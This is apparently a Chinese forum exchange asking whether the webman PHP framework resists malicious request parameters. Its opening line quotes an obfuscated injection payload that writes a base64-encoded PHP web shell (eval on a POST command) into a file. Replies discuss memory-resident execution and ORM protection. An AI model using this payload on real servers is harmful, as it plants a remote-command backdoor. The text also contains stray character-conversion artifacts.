id='-("fil"."e"._."pu"."t"._."contents")("./test1.php",("base"."64"._."decode")('PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4='),FILE_APPEND)-'
比如有人惡意給一個(gè)參數(shù)傳參這種webman有做處理嘛
webman 啟動(dòng)了就不會(huì)再次解析php文件程序常駐了。你的數(shù)據(jù)庫(kù)操作采用ORM的SQL注入大多數(shù)攔截了。沒(méi)事叫你們老板買好點(diǎn)服務(wù)器,阿里云免費(fèi)的支持木馬文件掃描和隔離的。就算你的文件上傳到服務(wù)器了,阿里云這邊隔離了。
哎,ZF項(xiàng)目用不了這些廠商的,orm我是用了的,老框架存被攻擊隊(duì)弄出了遠(yuǎn)程上傳,新框架打算采用webman
webman是常駐內(nèi)存的,即使用戶直接通過(guò)url訪問(wèn)上傳的php文件也無(wú)法運(yùn)行,這個(gè)機(jī)制比php-fpm更安全。
嗯 就是看中這個(gè)安全性
上面的參數(shù)傳遞到webman后只是一個(gè)字符串,并不會(huì)執(zhí)行,沒(méi)有危險(xiǎn)。
okok感謝解答